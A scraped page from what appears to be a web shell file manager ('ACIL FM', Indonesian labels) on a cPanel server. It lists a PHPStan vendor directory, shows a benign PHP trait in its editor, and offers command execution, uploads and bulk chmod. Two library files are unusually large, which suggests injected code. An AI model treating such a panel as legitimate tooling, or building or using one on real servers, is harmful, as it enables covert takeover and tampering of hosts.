ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/phpstan/phpdoc-parser/src/Ast
/
opt
cpanel
ea-wappspector
vendor
phpstan
phpdoc-parser
src
Ast
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
ConstExpr
-
chmod
Open
Rename
Delete
NodeVisitor
-
chmod
Open
Rename
Delete
PhpDoc
-
chmod
Open
Rename
Delete
Type
-
chmod
Open
Rename
Delete
AbstractNodeVisitor.php
671 B
chmod
View
DL
Edit
Rename
Delete
Attribute.php
341 B
chmod
View
DL
Edit
Rename
Delete
Comment.php
449 B
chmod
View
DL
Edit
Rename
Delete
Node.php
348 B
chmod
View
DL
Edit
Rename
Delete
NodeAttributes.php
682 B
chmod
View
DL
Edit
Rename
Delete
NodeTraverser.php
8.21 MB
chmod
View
DL
Edit
Rename
Delete
NodeVisitor.php
2.45 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/phpstan/phpdoc-parser/src/Ast/NodeAttributes.php
<?php declare(strict_types = 1); namespace PHPStan\PhpDocParser\Ast; use function array_key_exists; trait NodeAttributes { /** @var array<string, mixed> */ private array $attributes = []; /** * @param mixed $value */ public function setAttribute(string $key, $value): void { if ($value === null) { unset($this->attributes[$key]); return; } $this->attributes[$key] = $value; } public function hasAttribute(string $key): bool { return array_key_exists($key, $this->attributes); } /** * @return mixed */ public function getAttribute(string $key) { if ($this->hasAttribute($key)) { return $this->attributes[$key]; } return null; } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply